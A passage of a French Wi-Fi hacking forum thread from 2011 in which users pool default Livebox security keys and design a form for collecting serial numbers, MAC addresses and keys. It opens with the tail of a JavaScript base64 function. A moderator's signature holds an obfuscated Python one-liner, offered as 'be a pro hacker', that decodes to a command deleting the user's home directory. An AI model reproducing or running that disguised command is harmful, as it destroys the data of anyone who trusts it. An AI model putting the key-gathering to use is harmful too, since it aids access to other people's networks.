  var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  var str = "";
  for(var i = 0; i < binarray.length * 4; i += 3)
  {
    var triplet = (((binarray[i   >> 2] >> 8 * ( i   %4)) & 0xFF) << 16)
                | (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
                |  ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
    for(var j = 0; j < 4; j++)
    {
      if(i * 8 + j * 6 > binarray.length * 32) str += b64pad;
      else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
    }
  }
  return str;
}

En Ligne

#597 20-09-2011 21:16:03

Dagobert_78
Membre
Inscription : 06-01-2010
Messages : 15

Re : Retravailler des clé Livebox

Mes clefs peuvent passer les Pyrénées.

Hors Ligne

#598 20-09-2011 21:49:03

vances1
Membre Indispensable
Inscription : 20-03-2011
Messages : 530
Site Web

Re : Retravailler des clé Livebox

Je ne comprends pas l'idée du numéro de Firmware.
Chaque livebox porte un numéro de série unique et donc ça voudrait dire que le firmware est modifié à chaque box  ?

On en sais pas plus que toi, t'inquiete pas smile
Si jamais c'est bien le firmware les chiffres avant DP devrait suffire à différencier les box entre elles ... ce n'est qu'une supposition.

@koala c'est quoi ce code de malade ^^tu la sortit d'ou ? il à attisé ma curiosité mais je n'ai pas réussi à le faire tourner.

Mes clefs peuvent passer les Pyrénées.

Merci wink


Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

Hors Ligne

#599 20-09-2011 23:14:22

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Retravailler des clé Livebox

Je veux bien les clefs. J'en ai déja une partie que j'avais chopé à la main.

Je pense qu'il faudrait éplucher ce que l'on a dit et coller ca dans un post bien propre avant d'envoyer un dossier par dessus le pic du midi d'ossau smile
(avec les clefs, ce que l'on sait, ce que l'on suppose, et ce que l'on sait faux)

Quelqu'un parle espagnol ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#600 21-09-2011 06:23:12

Dagobert_78
Membre
Inscription : 06-01-2010
Messages : 15

Re : Retravailler des clé Livebox

Et pour le futur, un mini formulaire avec :

Pseudo du posteur :
Date de récupération :
Nom de modèle : (ex : Livebox 2)
Pays : (ex: France)
Nom de routeur (SSID) :
Adresse MAC de la BOX :
Adresse MAC du Wifi :
Numéro de série :
Version logicielle :
Adresse MAC :
Date de construction : (vos p'tites horloges)
Sécu d'origine : WEP ou WPA
Clef de sécurité : (26 caractères)
Rendue public : Oui/Non

Quoi d'autre utile ?

Dernière modification par Dagobert_78 (21-09-2011 06:25:03)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
35 1846 23-11-2016 16:31:33 par roofnat
12 10468 22-11-2016 15:12:09 par kcdtv
1 248 21-11-2016 15:38:39 par koala
0 399 20-11-2016 09:18:26 par regard48
livebox et clé psk par s1lv3rf0x
4 538 29-06-2016 23:26:36 par Fab955

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.033 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]